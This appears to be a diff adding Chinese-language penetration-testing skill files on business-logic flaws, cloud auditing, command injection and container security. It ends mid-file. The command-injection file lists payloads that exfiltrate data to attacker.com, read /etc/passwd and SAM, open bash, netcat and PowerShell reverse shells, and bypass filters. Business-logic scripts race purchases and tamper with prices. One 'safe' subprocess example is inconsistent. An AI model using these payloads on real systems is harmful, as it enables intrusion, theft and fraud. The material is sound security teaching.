### 5. 业务逻辑
|
||||
|
||||
**逻辑缺陷:**
|
||||
- 价格操作
|
||||
- 数量限制绕过
|
||||
- 状态修改
|
||||
|
||||
## 测试清单
|
||||
|
||||
### 认证测试
|
||||
- [ ] Token有效性验证
|
||||
- [ ] Token过期处理
|
||||
- [ ] 弱Token检测
|
||||
- [ ] Token重放攻击
|
||||
|
||||
### 授权测试
|
||||
- [ ] 水平权限测试
|
||||
- [ ] 垂直权限测试
|
||||
- [ ] 角色权限验证
|
||||
- [ ] 资源访问控制
|
||||
|
||||
### 输入验证
|
||||
- [ ] SQL注入测试
|
||||
- [ ] XSS测试
|
||||
- [ ] 命令注入测试
|
||||
- [ ] XXE测试
|
||||
- [ ] 参数污染
|
||||
|
||||
### 业务逻辑
|
||||
- [ ] 工作流验证
|
||||
- [ ] 状态转换
|
||||
- [ ] 并发控制
|
||||
- [ ] 业务规则
|
||||
|
||||
### 错误处理
|
||||
- [ ] 错误信息泄露
|
||||
- [ ] 堆栈跟踪
|
||||
- [ ] 敏感信息暴露
|
||||
|
||||
## 防护措施
|
||||
|
||||
### 推荐方案
|
||||
|
||||
1. **认证**
|
||||
- 使用强Token
|
||||
- 实现Token刷新
|
||||
- 验证Token签名
|
||||
|
||||
2. **授权**
|
||||
- 基于角色的访问控制
|
||||
- 资源所有权验证
|
||||
- 最小权限原则
|
||||
|
||||
3. **输入验证**
|
||||
- 参数类型验证
|
||||
- 数据长度限制
|
||||
- 白名单验证
|
||||
|
||||
4. **错误处理**
|
||||
- 统一错误响应
|
||||
- 不泄露详细信息
|
||||
- 记录错误日志
|
||||
|
||||
5. **速率限制**
|
||||
- 实现API限流
|
||||
- 防止暴力破解
|
||||
- 监控异常请求
|
||||
|
||||
## 注意事项
|
||||
|
||||
- 仅在授权测试环境中进行
|
||||
- 避免对API造成影响
|
||||
- 注意不同API版本的差异
|
||||
- 测试时注意请求频率
|
||||
@@ -0,0 +1,402 @@
|
||||
---
|
||||
name: business-logic-testing
|
||||
description: 业务逻辑漏洞测试的专业技能和方法论
|
||||
version: 1.0.0
|
||||
---
|
||||
|
||||
# 业务逻辑漏洞测试
|
||||
|
||||
## 概述
|
||||
|
||||
业务逻辑漏洞是应用程序在业务处理流程中的设计缺陷,可能导致未授权操作、数据篡改、资金损失等。本技能提供业务逻辑漏洞的检测、利用和防护方法。
|
||||
|
||||
## 漏洞类型
|
||||
|
||||
### 1. 工作流绕过
|
||||
|
||||
**跳过验证步骤:**
|
||||
- 直接访问最终步骤
|
||||
- 修改步骤顺序
|
||||
- 重复执行步骤
|
||||
|
||||
### 2. 价格操作
|
||||
|
||||
**负数价格:**
|
||||
- 输入负数金额
|
||||
- 导致账户余额增加
|
||||
|
||||
**价格篡改:**
|
||||
- 修改前端价格
|
||||
- 修改API请求中的价格
|
||||
|
||||
### 3. 数量限制绕过
|
||||
|
||||
**负数数量:**
|
||||
- 输入负数
|
||||
- 可能导致库存增加
|
||||
|
||||
**超出限制:**
|
||||
- 修改数量限制
|
||||
- 批量操作绕过
|
||||
|
||||
### 4. 时间竞争
|
||||
|
||||
**并发请求:**
|
||||
- 同时发送多个请求
|
||||
- 绕过单次限制
|
||||
|
||||
### 5. 状态操作
|
||||
|
||||
**状态回退:**
|
||||
- 将已完成订单改为待支付
|
||||
- 修改订单状态
|
||||
|
||||
## 测试方法
|
||||
|
||||
### 1. 工作流分析
|
||||
|
||||
**识别业务流程:**
|
||||
- 注册流程
|
||||
- 购买流程
|
||||
- 提现流程
|
||||
- 审核流程
|
||||
|
||||
**测试步骤跳过:**
|
||||
```
|
||||
正常流程: 步骤1 → 步骤2 → 步骤3
|
||||
测试: 直接访问步骤3
|
||||
测试: 步骤1 → 步骤3(跳过步骤2)
|
||||
```
|
||||
|
||||
### 2. 参数篡改
|
||||
|
||||
**修改关键参数:**
|
||||
```http
|
||||
POST /api/purchase
|
||||
{
|
||||
"product_id": 123,
|
||||
"quantity": 1,
|
||||
"price": 100.00 # 修改为 0.01
|
||||
}
|
||||
```
|
||||
|
||||
**负数测试:**
|
||||
```json
|
||||
{
|
||||
"quantity": -1,
|
||||
"price": -100.00
|
||||
}
|
||||
```
|
||||
|
||||
### 3. 并发测试
|
||||
|
||||
**同时发送请求:**
|
||||
```python
|
||||
import threading
|
||||
import requests
|
||||
|
||||
def purchase():
|
||||
requests.post('https://target.com/api/purchase',
|
||||
json={'product_id': 123, 'quantity': 1})
|
||||
|
||||
# 同时发送10个请求
|
||||
for i in range(10):
|
||||
threading.Thread(target=purchase).start()
|
||||
```
|
||||
|
||||
### 4. 状态修改
|
||||
|
||||
**修改订单状态:**
|
||||
```http
|
||||
PATCH /api/order/123
|
||||
{
|
||||
"status": "completed" # 修改为已完成
|
||||
}
|
||||
```
|
||||
|
||||
**回退状态:**
|
||||
```http
|
||||
PATCH /api/order/123
|
||||
{
|
||||
"status": "pending" # 从已完成回退到待支付
|
||||
}
|
||||
```
|
||||
|
||||
## 利用技术
|
||||
|
||||
### 价格操作
|
||||
|
||||
**负数价格:**
|
||||
```json
|
||||
{
|
||||
"product_id": 123,
|
||||
"price": -100.00,
|
||||
"quantity": 1
|
||||
}
|
||||
```
|
||||
|
||||
**修改前端价格:**
|
||||
```javascript
|
||||
// 前端代码
|
||||
const price = 100.00;
|
||||
|
||||
// 修改为
|
||||
const price = 0.01;
|
||||
```
|
||||
|
||||
**API价格修改:**
|
||||
```http
|
||||
POST /api/checkout
|
||||
{
|
||||
"items": [
|
||||
{
|
||||
"product_id": 123,
|
||||
"price": 0.01, # 原价100.00
|
||||
"quantity": 1
|
||||
}
|
||||
]
|
||||
}
|
||||
```
|
||||
|
||||
### 数量限制绕过
|
||||
|
||||
**负数数量:**
|
||||
```json
|
||||
{
|
||||
"product_id": 123,
|
||||
"quantity": -10 # 可能导致库存增加
|
||||
}
|
||||
```
|
||||
|
||||
**超出限制:**
|
||||
```json
|
||||
{
|
||||
"product_id": 123,
|
||||
"quantity": 999999 # 超出单次购买限制
|
||||
}
|
||||
```
|
||||
|
||||
### 优惠券滥用
|
||||
|
||||
**重复使用:**
|
||||
```http
|
||||
POST /api/checkout
|
||||
{
|
||||
"coupon": "DISCOUNT50",
|
||||
"items": [...]
|
||||
}
|
||||
|
||||
# 重复使用同一优惠券
|
||||
```
|
||||
|
||||
**未激活优惠券:**
|
||||
```http
|
||||
POST /api/checkout
|
||||
{
|
||||
"coupon": "EXPIRED_COUPON", # 使用过期优惠券
|
||||
"items": [...]
|
||||
}
|
||||
```
|
||||
|
||||
### 提现漏洞
|
||||
|
||||
**负数提现:**
|
||||
```json
|
||||
{
|
||||
"amount": -1000.00 # 可能导致账户余额增加
|
||||
}
|
||||
```
|
||||
|
||||
**超出余额:**
|
||||
```json
|
||||
{
|
||||
"amount": 999999.00 # 超出账户余额
|
||||
}
|
||||
```
|
||||
|
||||
### 时间竞争
|
||||
|
||||
**并发购买:**
|
||||
```python
|
||||
import threading
|
||||
import requests
|
||||
|
||||
def buy():
|
||||
requests.post('https://target.com/api/purchase',
|
||||
json={'product_id': 123, 'quantity': 1})
|
||||
|
||||
# 限时抢购,并发请求
|
||||
for i in range(100):
|
||||
threading.Thread(target=buy).start()
|
||||
```
|
||||
|
||||
## 绕过技术
|
||||
|
||||
### 前端验证绕过
|
||||
|
||||
**直接调用API:**
|
||||
- 绕过前端JavaScript验证
|
||||
- 直接发送API请求
|
||||
|
||||
**修改请求:**
|
||||
- 使用Burp Suite拦截
|
||||
- 修改参数后发送
|
||||
|
||||
### 状态码分析
|
||||
|
||||
**观察响应:**
|
||||
- 200 OK - 可能成功
|
||||
- 400 Bad Request - 参数错误
|
||||
- 403 Forbidden - 权限不足
|
||||
- 500 Internal Server Error - 服务器错误
|
||||
|
||||
### 错误信息利用
|
||||
|
||||
**从错误信息获取信息:**
|
||||
```
|
||||
错误: "余额不足,当前余额: 100.00"
|
||||
→ 可以获取账户余额信息
|
||||
```
|
||||
|
||||
## 工具使用
|
||||
|
||||
### Burp Suite
|
||||
|
||||
**使用Repeater:**
|
||||
1. 拦截业务请求
|
||||
2. 修改关键参数
|
||||
3. 观察响应
|
||||
|
||||
**使用Intruder:**
|
||||
1. 标记参数
|
||||
2. 使用Payload列表
|
||||
3. 批量测试
|
||||
|
||||
### 自定义脚本
|
||||
|
||||
```python
|
||||
import requests
|
||||
import json
|
||||
|
||||
def test_price_manipulation():
|
||||
# 测试价格修改
|
||||
for price in [0.01, -100, 0, 999999]:
|
||||
data = {
|
||||
"product_id": 123,
|
||||
"price": price,
|
||||
"quantity": 1
|
||||
}
|
||||
response = requests.post('https://target.com/api/purchase',
|
||||
json=data)
|
||||
print(f"Price {price}: {response.status_code}")
|
||||
|
||||
test_price_manipulation()
|
||||
```
|
||||
|
||||
## 验证和报告
|
||||
|
||||
### 验证步骤
|
||||
|
||||
1. 确认可以绕过业务逻辑限制
|
||||
2. 验证可以执行未授权操作
|
||||
3. 评估影响(资金损失、数据篡改等)
|
||||
4. 记录完整的POC
|
||||
|
||||
### 报告要点
|
||||
|
||||
- 漏洞位置和业务流程
|
||||
- 可执行的未授权操作
|
||||
- 完整的利用步骤和PoC
|
||||
- 修复建议(服务端验证、业务规则检查等)
|
||||
|
||||
## 防护措施
|
||||
|
||||
### 推荐方案
|
||||
|
||||
1. **服务端验证**
|
||||
```python
|
||||
def process_purchase(product_id, quantity, price):
|
||||
# 从数据库获取真实价格
|
||||
real_price = db.get_product_price(product_id)
|
||||
|
||||
# 验证价格
|
||||
if price != real_price:
|
||||
raise ValueError("Price mismatch")
|
||||
|
||||
# 验证数量
|
||||
if quantity <= 0:
|
||||
raise ValueError("Invalid quantity")
|
||||
|
||||
# 处理购买
|
||||
process_order(product_id, quantity, real_price)
|
||||
```
|
||||
|
||||
2. **状态机验证**
|
||||
```python
|
||||
class OrderState:
|
||||
PENDING = "pending"
|
||||
PAID = "paid"
|
||||
SHIPPED = "shipped"
|
||||
COMPLETED = "completed"
|
||||
|
||||
TRANSITIONS = {
|
||||
PENDING: [PAID],
|
||||
PAID: [SHIPPED],
|
||||
SHIPPED: [COMPLETED]
|
||||
}
|
||||
|
||||
def can_transition(self, from_state, to_state):
|
||||
return to_state in self.TRANSITIONS.get(from_state, [])
|
||||
```
|
||||
|
||||
3. **并发控制**
|
||||
```python
|
||||
import threading
|
||||
|
||||
lock = threading.Lock()
|
||||
|
||||
def process_order(order_id):
|
||||
with lock:
|
||||
# 检查订单状态
|
||||
order = db.get_order(order_id)
|
||||
if order.status != 'pending':
|
||||
raise ValueError("Order already processed")
|
||||
|
||||
# 处理订单
|
||||
process(order)
|
||||
```
|
||||
|
||||
4. **业务规则验证**
|
||||
```python
|
||||
def validate_business_rules(order):
|
||||
# 验证数量限制
|
||||
if order.quantity > MAX_QUANTITY:
|
||||
raise ValueError("Quantity exceeds limit")
|
||||
|
||||
# 验证价格范围
|
||||
if order.price <= 0:
|
||||
raise ValueError("Invalid price")
|
||||
|
||||
# 验证库存
|
||||
if order.quantity > get_stock(order.product_id):
|
||||
raise ValueError("Insufficient stock")
|
||||
```
|
||||
|
||||
5. **审计日志**
|
||||
```python
|
||||
def log_business_action(user_id, action, details):
|
||||
log_entry = {
|
||||
"user_id": user_id,
|
||||
"action": action,
|
||||
"details": details,
|
||||
"timestamp": datetime.now()
|
||||
}
|
||||
db.log_action(log_entry)
|
||||
```
|
||||
|
||||
## 注意事项
|
||||
|
||||
- 仅在授权测试环境中进行
|
||||
- 避免对业务造成实际影响
|
||||
- 注意不同业务流程的差异
|
||||
- 测试时注意数据一致性
|
||||
@@ -0,0 +1,343 @@
|
||||
---
|
||||
name: cloud-security-audit
|
||||
description: 云安全审计的专业技能和方法论
|
||||
version: 1.0.0
|
||||
---
|
||||
|
||||
# 云安全审计
|
||||
|
||||
## 概述
|
||||
|
||||
云安全审计是评估云环境安全性的重要环节。本技能提供云安全审计的方法、工具和最佳实践,涵盖AWS、Azure、GCP等主流云平台。
|
||||
|
||||
## 审计范围
|
||||
|
||||
### 1. 身份和访问管理
|
||||
|
||||
**检查项目:**
|
||||
- IAM策略配置
|
||||
- 用户权限
|
||||
- 角色权限
|
||||
- 访问密钥管理
|
||||
|
||||
### 2. 网络安全
|
||||
|
||||
**检查项目:**
|
||||
- 安全组配置
|
||||
- 网络ACL
|
||||
- VPC配置
|
||||
- 流量加密
|
||||
|
||||
### 3. 数据安全
|
||||
|
||||
**检查项目:**
|
||||
- 数据加密
|
||||
- 密钥管理
|
||||
- 备份策略
|
||||
- 数据分类
|
||||
|
||||
### 4. 合规性
|
||||
|
||||
**检查项目:**
|
||||
- 合规框架
|
||||
- 审计日志
|
||||
- 监控告警
|
||||
- 事件响应
|
||||
|
||||
## AWS安全审计
|
||||
|
||||
### IAM审计
|
||||
|
||||
**检查IAM策略:**
|
||||
```bash
|
||||
# 列出所有IAM用户
|
||||
aws iam list-users
|
||||
|
||||
# 列出所有IAM策略
|
||||
aws iam list-policies
|
||||
|
||||
# 检查用户权限
|
||||
aws iam list-user-policies --user-name username
|
||||
aws iam list-attached-user-policies --user-name username
|
||||
|
||||
# 检查角色权限
|
||||
aws iam list-role-policies --role-name rolename
|
||||
```
|
||||
|
||||
**常见问题:**
|
||||
- 过度权限
|
||||
- 未使用的访问密钥
|
||||
- 密码策略弱
|
||||
- MFA未启用
|
||||
|
||||
### S3安全审计
|
||||
|
||||
**检查S3存储桶:**
|
||||
```bash
|
||||
# 列出所有存储桶
|
||||
aws s3 ls
|
||||
|
||||
# 检查存储桶策略
|
||||
aws s3api get-bucket-policy --bucket bucketname
|
||||
|
||||
# 检查存储桶ACL
|
||||
aws s3api get-bucket-acl --bucket bucketname
|
||||
|
||||
# 检查存储桶加密
|
||||
aws s3api get-bucket-encryption --bucket bucketname
|
||||
```
|
||||
|
||||
**常见问题:**
|
||||
- 公开访问
|
||||
- 未加密
|
||||
- 版本控制未启用
|
||||
- 日志记录未启用
|
||||
|
||||
### 安全组审计
|
||||
|
||||
**检查安全组:**
|
||||
```bash
|
||||
# 列出所有安全组
|
||||
aws ec2 describe-security-groups
|
||||
|
||||
# 检查开放端口
|
||||
aws ec2 describe-security-groups --group-ids sg-xxx
|
||||
```
|
||||
|
||||
**常见问题:**
|
||||
- 0.0.0.0/0开放
|
||||
- 不必要的端口开放
|
||||
- 规则过于宽松
|
||||
|
||||
### CloudTrail审计
|
||||
|
||||
**检查审计日志:**
|
||||
```bash
|
||||
# 列出所有跟踪
|
||||
aws cloudtrail describe-trails
|
||||
|
||||
# 检查日志文件完整性
|
||||
aws cloudtrail get-trail-status --name trailname
|
||||
```
|
||||
|
||||
## Azure安全审计
|
||||
|
||||
### 订阅和资源组
|
||||
|
||||
**检查订阅:**
|
||||
```bash
|
||||
# 列出所有订阅
|
||||
az account list
|
||||
|
||||
# 检查资源组
|
||||
az group list
|
||||
```
|
||||
|
||||
### 网络安全组
|
||||
|
||||
**检查NSG:**
|
||||
```bash
|
||||
# 列出所有NSG
|
||||
az network nsg list
|
||||
|
||||
# 检查NSG规则
|
||||
az network nsg rule list --nsg-name nsgname --resource-group rgname
|
||||
```
|
||||
|
||||
### 存储账户
|
||||
|
||||
**检查存储账户:**
|
||||
```bash
|
||||
# 列出所有存储账户
|
||||
az storage account list
|
||||
|
||||
# 检查访问策略
|
||||
az storage account show --name accountname --resource-group rgname
|
||||
```
|
||||
|
||||
## GCP安全审计
|
||||
|
||||
### 项目和组织
|
||||
|
||||
**检查项目:**
|
||||
```bash
|
||||
# 列出所有项目
|
||||
gcloud projects list
|
||||
|
||||
# 检查IAM策略
|
||||
gcloud projects get-iam-policy project-id
|
||||
```
|
||||
|
||||
### 计算引擎
|
||||
|
||||
**检查实例:**
|
||||
```bash
|
||||
# 列出所有实例
|
||||
gcloud compute instances list
|
||||
|
||||
# 检查防火墙规则
|
||||
gcloud compute firewall-rules list
|
||||
```
|
||||
|
||||
### 存储
|
||||
|
||||
**检查存储桶:**
|
||||
```bash
|
||||
# 列出所有存储桶
|
||||
gsutil ls
|
||||
|
||||
# 检查存储桶权限
|
||||
gsutil iam get gs://bucketname
|
||||
```
|
||||
|
||||
## 自动化工具
|
||||
|
||||
### Scout Suite
|
||||
|
||||
```bash
|
||||
# AWS审计
|
||||
scout aws
|
||||
|
||||
# Azure审计
|
||||
scout azure
|
||||
|
||||
# GCP审计
|
||||
scout gcp
|
||||
```
|
||||
|
||||
### Prowler
|
||||
|
||||
```bash
|
||||
# AWS安全审计
|
||||
prowler -c check11,check12,check13
|
||||
|
||||
# 完整审计
|
||||
prowler
|
||||
```
|
||||
|
||||
### CloudSploit
|
||||
|
||||
```bash
|
||||
# 扫描AWS账户
|
||||
cloudsploit scan aws
|
||||
|
||||
# 扫描Azure订阅
|
||||
cloudsploit scan azure
|
||||
```
|
||||
|
||||
### Pacu
|
||||
|
||||
```bash
|
||||
# AWS渗透测试框架
|
||||
pacu
|
||||
```
|
||||
|
||||
## 审计清单
|
||||
|
||||
### IAM安全
|
||||
- [ ] 检查用户权限
|
||||
- [ ] 检查角色权限
|
||||
- [ ] 检查访问密钥
|
||||
- [ ] 检查密码策略
|
||||
- [ ] 检查MFA启用情况
|
||||
|
||||
### 网络安全
|
||||
- [ ] 检查安全组/NSG规则
|
||||
- [ ] 检查VPC配置
|
||||
- [ ] 检查网络ACL
|
||||
- [ ] 检查流量加密
|
||||
|
||||
### 数据安全
|
||||
- [ ] 检查数据加密
|
||||
- [ ] 检查密钥管理
|
||||
- [ ] 检查备份策略
|
||||
- [ ] 检查数据分类
|
||||
|
||||
### 合规性
|
||||
- [ ] 检查审计日志
|
||||
- [ ] 检查监控告警
|
||||
- [ ] 检查事件响应
|
||||
- [ ] 检查合规框架
|
||||
|
||||
## 常见安全问题
|
||||
|
||||
### 1. 过度权限
|
||||
|
||||
**问题:**
|
||||
- IAM策略过于宽松
|
||||
- 用户拥有管理员权限
|
||||
- 角色权限过大
|
||||
|
||||
**修复:**
|
||||
- 最小权限原则
|
||||
- 定期审查权限
|
||||
- 使用IAM策略模拟
|
||||
|
||||
### 2. 公开资源
|
||||
|
||||
**问题:**
|
||||
- S3存储桶公开
|
||||
- 安全组开放0.0.0.0/0
|
||||
- 数据库公开访问
|
||||
|
||||
**修复:**
|
||||
- 限制访问范围
|
||||
- 使用私有网络
|
||||
- 启用访问控制
|
||||
|
||||
### 3. 未加密数据
|
||||
|
||||
**问题:**
|
||||
- 存储未加密
|
||||
- 传输未加密
|
||||
- 密钥管理不当
|
||||
|
||||
**修复:**
|
||||
- 启用加密
|
||||
- 使用TLS/SSL
|
||||
- 使用密钥管理服务
|
||||
|
||||
### 4. 日志缺失
|
||||
|
||||
**问题:**
|
||||
- 未启用审计日志
|
||||
- 日志未保留
|
||||
- 日志未监控
|
||||
|
||||
**修复:**
|
||||
- 启用CloudTrail/Azure Monitor
|
||||
- 设置日志保留策略
|
||||
- 配置监控告警
|
||||
|
||||
## 最佳实践
|
||||
|
||||
### 1. 最小权限
|
||||
|
||||
- 只授予必要权限
|
||||
- 定期审查权限
|
||||
- 使用IAM策略模拟
|
||||
|
||||
### 2. 多层防护
|
||||
|
||||
- 网络层防护
|
||||
- 应用层防护
|
||||
- 数据层防护
|
||||
|
||||
### 3. 监控和告警
|
||||
|
||||
- 启用审计日志
|
||||
- 配置监控告警
|
||||
- 建立事件响应流程
|
||||
|
||||
### 4. 合规性
|
||||
|
||||
- 遵循合规框架
|
||||
- 定期安全审计
|
||||
- 文档化安全策略
|
||||
|
||||
## 注意事项
|
||||
|
||||
- 仅在授权环境中进行审计
|
||||
- 避免对生产环境造成影响
|
||||
- 注意不同云平台的差异
|
||||
- 定期进行安全审计
|
||||
@@ -0,0 +1,302 @@
|
||||
---
|
||||
name: command-injection-testing
|
||||
description: 命令注入漏洞测试的专业技能和方法论
|
||||
version: 1.0.0
|
||||
---
|
||||
|
||||
# 命令注入漏洞测试
|
||||
|
||||
## 概述
|
||||
|
||||
命令注入是一种通过应用程序执行系统命令的漏洞。当应用程序将用户输入直接传递给系统命令时,攻击者可以执行任意命令。本技能提供命令注入的检测、利用和防护方法。
|
||||
|
||||
## 漏洞原理
|
||||
|
||||
应用程序调用系统命令时,未对用户输入进行充分验证和过滤,导致攻击者可以注入额外的命令。
|
||||
|
||||
**危险代码示例:**
|
||||
```php
|
||||
// PHP
|
||||
system("ping " . $_GET['ip']);
|
||||
|
||||
// Python
|
||||
os.system("ping " + user_input)
|
||||
|
||||
// Node.js
|
||||
child_process.exec("ping " + user_input)
|
||||
```
|
||||
|
||||
## 测试方法
|
||||
|
||||
### 1. 识别命令执行点
|
||||
|
||||
**常见功能:**
|
||||
- Ping功能
|
||||
- DNS查询
|
||||
- 文件操作
|
||||
- 系统信息
|
||||
- 日志查看
|
||||
- 备份恢复
|
||||
|
||||
### 2. 基础检测
|
||||
|
||||
**测试命令分隔符:**
|
||||
```
|
||||
; # 命令分隔符(Linux/Windows)
|
||||
& # 后台执行(Linux/Windows)
|
||||
| # 管道符(Linux/Windows)
|
||||
&& # 逻辑与(Linux/Windows)
|
||||
|| # 逻辑或(Linux/Windows)
|
||||
` # 命令替换(Linux)
|
||||
$() # 命令替换(Linux)
|
||||
```
|
||||
|
||||
**测试Payload:**
|
||||
```
|
||||
127.0.0.1; id
|
||||
127.0.0.1 && whoami
|
||||
127.0.0.1 | cat /etc/passwd
|
||||
127.0.0.1 `whoami`
|
||||
127.0.0.1 $(whoami)
|
||||
```
|
||||
|
||||
### 3. 盲命令注入
|
||||
|
||||
**时间延迟检测:**
|
||||
```
|
||||
127.0.0.1; sleep 5
|
||||
127.0.0.1 && sleep 5
|
||||
127.0.0.1 | sleep 5
|
||||
```
|
||||
|
||||
**外带数据:**
|
||||
```
|
||||
127.0.0.1; curl http://attacker.com/?$(whoami)
|
||||
127.0.0.1 && wget http://attacker.com/$(cat /etc/passwd)
|
||||
```
|
||||
|
||||
**DNS外带:**
|
||||
```
|
||||
127.0.0.1; nslookup $(whoami).attacker.com
|
||||
```
|
||||
|
||||
## 利用技术
|
||||
|
||||
### 基础命令执行
|
||||
|
||||
**Linux:**
|
||||
```
|
||||
; id
|
||||
; whoami
|
||||
; uname -a
|
||||
; cat /etc/passwd
|
||||
; ls -la
|
||||
```
|
||||
|
||||
**Windows:**
|
||||
```
|
||||
& whoami
|
||||
& ipconfig
|
||||
& type C:\Windows\System32\drivers\etc\hosts
|
||||
& dir
|
||||
```
|
||||
|
||||
### 文件操作
|
||||
|
||||
**读取文件:**
|
||||
```
|
||||
; cat /etc/passwd
|
||||
; type C:\Windows\System32\config\sam
|
||||
; head -n 20 /var/log/apache2/access.log
|
||||
```
|
||||
|
||||
**写入文件:**
|
||||
```
|
||||
; echo "<?php phpinfo(); ?>" > /tmp/shell.php
|
||||
; echo "test" > C:\temp\test.txt
|
||||
```
|
||||
|
||||
### 反弹Shell
|
||||
|
||||
**Bash:**
|
||||
```
|
||||
; bash -i >& /dev/tcp/attacker.com/4444 0>&1
|
||||
```
|
||||
|
||||
**Netcat:**
|
||||
```
|
||||
; nc -e /bin/bash attacker.com 4444
|
||||
; rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc attacker.com 4444 >/tmp/f
|
||||
```
|
||||
|
||||
**PowerShell:**
|
||||
```
|
||||
& powershell -nop -c "$client = New-Object System.Net.Sockets.TCPClient('attacker.com',4444);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()"
|
||||
```
|
||||
|
||||
## 绕过技术
|
||||
|
||||
### 空格绕过
|
||||
|
||||
```
|
||||
${IFS}id
|
||||
${IFS}whoami
|
||||
$IFS$9id
|
||||
<>
|
||||
%09 (Tab)
|
||||
%20 (Space)
|
||||
```
|
||||
|
||||
### 命令分隔符绕过
|
||||
|
||||
**编码绕过:**
|
||||
```
|
||||
%3b (;)
|
||||
%26 (&)
|
||||
%7c (|)
|
||||
```
|
||||
|
||||
**换行绕过:**
|
||||
```
|
||||
%0a (换行)
|
||||
%0d (回车)
|
||||
```
|
||||
|
||||
### 关键字过滤绕过
|
||||
|
||||
**变量拼接:**
|
||||
```bash
|
||||
a=w;b=ho;c=ami;$a$b$c
|
||||
```
|
||||
|
||||
**通配符:**
|
||||
```bash
|
||||
/bin/c?t /etc/passwd
|
||||
/usr/bin/ca* /etc/passwd
|
||||
```
|
||||
|
||||
**引号绕过:**
|
||||
```bash
|
||||
w'h'o'a'm'i
|
||||
w"h"o"a"m"i
|
||||
```
|
||||
|
||||
**反斜杠:**
|
||||
```bash
|
||||
w\ho\am\i
|
||||
```
|
||||
|
||||
**Base64编码:**
|
||||
```bash
|
||||
echo "d2hvYW1p" | base64 -d | bash
|
||||
```
|
||||
|
||||
### 长度限制绕过
|
||||
|
||||
**使用文件:**
|
||||
```bash
|
||||
echo "id" > /tmp/c
|
||||
sh /tmp/c
|
||||
```
|
||||
|
||||
**使用环境变量:**
|
||||
```bash
|
||||
export x='id';$x
|
||||
```
|
||||
|
||||
## 工具使用
|
||||
|
||||
### Commix
|
||||
|
||||
```bash
|
||||
# 基础扫描
|
||||
python commix.py -u "http://target.com/ping?ip=127.0.0.1"
|
||||
|
||||
# 指定注入点
|
||||
python commix.py -u "http://target.com/ping?ip=INJECT_HERE" --data="ip=INJECT_HERE"
|
||||
|
||||
# 获取Shell
|
||||
python commix.py -u "http://target.com/ping?ip=127.0.0.1" --os-shell
|
||||
```
|
||||
|
||||
### Burp Suite
|
||||
|
||||
1. 拦截请求
|
||||
2. 发送到Intruder
|
||||
3. 使用命令注入Payload列表
|
||||
4. 观察响应或时间延迟
|
||||
|
||||
## 验证和报告
|
||||
|
||||
### 验证步骤
|
||||
|
||||
1. 确认可以执行系统命令
|
||||
2. 验证命令执行结果
|
||||
3. 评估影响(系统控制、数据泄露等)
|
||||
4. 记录完整的POC
|
||||
|
||||
### 报告要点
|
||||
|
||||
- 漏洞位置和输入参数
|
||||
- 可执行的命令类型
|
||||
- 完整的利用步骤和POC
|
||||
- 修复建议(输入验证、参数化、白名单等)
|
||||
|
||||
## 防护措施
|
||||
|
||||
### 推荐方案
|
||||
|
||||
1. **避免命令执行**
|
||||
- 使用API替代系统命令
|
||||
- 使用库函数替代命令
|
||||
|
||||
2. **输入验证**
|
||||
```python
|
||||
import re
|
||||
|
||||
def validate_ip(ip):
|
||||
pattern = r'^(\d{1,3}\.){3}\d{1,3}$'
|
||||
if not re.match(pattern, ip):
|
||||
raise ValueError("Invalid IP")
|
||||
parts = ip.split('.')
|
||||
if not all(0 <= int(p) <= 255 for p in parts):
|
||||
raise ValueError("Invalid IP range")
|
||||
return ip
|
||||
```
|
||||
|
||||
3. **参数化命令**
|
||||
```python
|
||||
import subprocess
|
||||
|
||||
# 危险
|
||||
subprocess.call(['ping', '-c', '1', user_input])
|
||||
|
||||
# 安全 - 使用参数列表
|
||||
subprocess.call(['ping', '-c', '1', validated_ip])
|
||||
```
|
||||
|
||||
4. **白名单验证**
|
||||
```python
|
||||
ALLOWED_COMMANDS = ['ping', 'nslookup']
|
||||
ALLOWED_OPTIONS = {'ping': ['-c', '-n']}
|
||||
|
||||
if command not in ALLOWED_COMMANDS:
|
||||
raise ValueError("Command not allowed")
|
||||
```
|
||||
|
||||
5. **最小权限**
|
||||
- 使用低权限用户运行应用
|
||||
- 限制文件系统访问
|
||||
- 使用chroot或容器隔离
|
||||
|
||||
6. **输出过滤**
|
||||
- 限制输出内容
|
||||
- 过滤敏感信息
|
||||
- 记录命令执行日志
|
||||
|
||||
## 注意事项
|
||||
|
||||
- 仅在授权测试环境中进行
|
||||
- 避免对系统造成破坏
|
||||
- 注意不同操作系统的命令差异
|
||||
- 测试时注意命令执行的影响范围
|
||||
@@ -0,0 +1,377 @@
|
||||
---
|
||||
name: container-security-testing
|
||||
description: 容器安全测试的专业技能和方法论
|
||||
version: 1.0.0
|
||||
---
|
||||
|
||||
# 容器安全测试
|
||||
|
||||
## 概述
|
||||
|
||||
容器安全测试是确保容器化应用安全性的重要环节。本技能提供容器安全测试的方法、工具和最佳实践,涵盖Docker、Kubernetes等容器技术。
|
||||
|
||||
## 测试范围
|
||||
|
||||
### 1. 镜像安全
|
||||
|
||||
**检查项目:**
|
||||
- 基础镜像漏洞
|
||||
- 依赖包漏洞
|
||||
- 镜像配置
|
||||
- 敏感信息
|
||||
|
||||
### 2. 运行时安全
|
||||
|
||||
**检查项目:**
|
||||
- 容器权限
|
||||
- 资源限制
|
||||
- 网络隔离
|
||||
- 文件系统
|
||||
|
||||
### 3. 编排安全
|
||||
|
||||
**检查项目:**
|
||||
- Kubernetes配置
|
||||
- 服务账户
|
||||
- RBAC
|
||||
- 网络策略
|
||||
|
||||
## Docker安全测试
|
||||
|
||||
### 镜像扫描
|
||||
|
||||
**使用Trivy:**
|
||||
```bash
|
||||
# 扫描镜像
|
||||
trivy image nginx:latest
|
||||
|
||||
# 扫描本地镜像
|
||||
trivy image --input nginx.tar
|
||||
|
||||
# 只显示高危漏洞
|
||||
trivy image --severity HIGH,CRITICAL nginx:latest
|
||||
```
|
||||
|
||||
**使用Clair:**
|
||||
```bash
|
||||
# 启动Clair
|
||||
docker run -d --name clair clair:latest
|
||||
|
||||
# 扫描镜像
|
||||
clair-scanner --ip 192.168.1.100 nginx:latest
|
||||
```
|
||||
|
||||
**使用Docker Bench:**
|
||||
```bash
|
||||
